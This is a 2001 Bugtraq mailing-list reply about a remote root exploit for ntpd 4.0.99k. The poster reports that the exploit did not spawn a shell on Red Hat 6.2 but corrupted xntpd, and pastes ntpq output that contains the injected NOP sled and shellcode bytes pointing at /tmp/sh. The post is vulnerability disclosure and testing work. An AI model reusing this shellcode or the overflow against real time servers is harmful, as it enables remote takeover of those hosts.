[20101] in bugtraq
Re: ntpd =< 4.0.99k remote buffer overflow
daemon@ATHENA.MIT.EDU (Viraj Alankar)
Mon Apr 9 05:49:06 2001
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-ID: <Pine.GSO.4.31.0104071107020.18358-100000@home.ifxcorp.com>
Date: Sat, 7 Apr 2001 11:18:13 -0400
Reply-To: Viraj Alankar <valankar@IFXCORP.COM>
From: Viraj Alankar <valankar@IFXCORP.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <20010404222701.X91913@riget.scene.pl>
On Wed, 4 Apr 2001, Przemyslaw Frasunek wrote:
> /* ntpd remote root exploit / babcia padlina ltd. <venglin@freebsd.lublin.pl> */
Attempting this on a Redhat 6.2 system with xntp3-5.93 did not seem
execute /tmp/sh or crash immediately but it did cause some corruption in
xntpd as can be seen below.
/usr/sbin/ntpq localhost
ntpq> rl
status=06f4 leap_none, sync_ntp, 15 events, event_peer/strat_chg
system="M-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-k^_^M-^Iv^H1M-@M-^HF^GM-^IF^LM-0^KM-^IM-sM-^MN^HM-^MV^LM-MM-^@1M-[M-^IM-X@M-MM-^@M-hM-\M-^?M-^?M-^?/tmp/shM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PwM-wM-^?M-?wM-wM-^?M-?M-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^P,
leap=00, stratum=4, rootdelay=78.70, rootdispersion=98.05, peer=12340,
refid=my.ntp.server,
reftime=be79abbf.f4677000 Sat, Apr 7 2001 11:07:43.954, poll=6,
clock=be79abfe.47251000 Sat, Apr 7 2001 11:08:46.277, phase=0.317,
freq=41029.82, error=0.12
ntpq>
Viraj.
